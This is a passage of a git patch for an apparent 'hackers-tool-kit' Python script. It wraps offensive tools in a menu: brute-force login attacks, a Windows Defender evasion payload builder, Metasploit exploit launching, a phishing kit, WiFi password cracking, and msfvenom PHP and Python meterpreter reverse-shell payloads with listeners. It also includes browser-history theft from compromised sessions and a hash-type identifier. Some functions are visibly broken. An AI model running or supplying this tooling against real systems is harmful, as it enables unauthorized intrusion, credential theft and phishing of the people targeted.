jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#PYLOAD START# -#------------# -def pyload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> pyload.rc') - os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') - os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) - os.system('echo "exploit\n" >> pyload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r pyload.rc') - os.system('rm -rf pyload.rc') - if yn == "n": - os.system('echo " "') -#----------# -#PYLOAD END# - - -#FOXHIS START# -#------------# -def foxhis(): - os.system('echo "sessions\n" >> foxhisses.rc') - os.system('echo "exit\n" >> foxhisses.rc') - os.system("service postgresql restart") - os.system('msfconsole -q -r foxhisses.rc') - os.system('rm -rf foxhisses.rc') - print "\n" - ses = raw_input("Session: ") - print "\nMaximum time (seconds) to wait for a response\n" - time = raw_input("Timeout: ") - os.system('echo "use firefox/gather/history\n" >> foxhis.rc') - os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) - os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) - os.system('echo "run\n" >> foxhis.rc') - os.system('msfconsole -q -r foxhis.rc') - os.system('rm -fr foxhis.rc') - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - if x == "pyload": - pyload() - if x == "foxhis": - foxhis() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From fb3fc48c6e23c82ad40c4eea60d069dd0f144268 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 27 May 2019 23:33:06 +0100 Subject: [PATCH 153/214] Add files via upload --- htk.py | 2990 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2990 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..785a097 --- /dev/null +++ b/htk.py @@ -0,0 +1,2990 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting 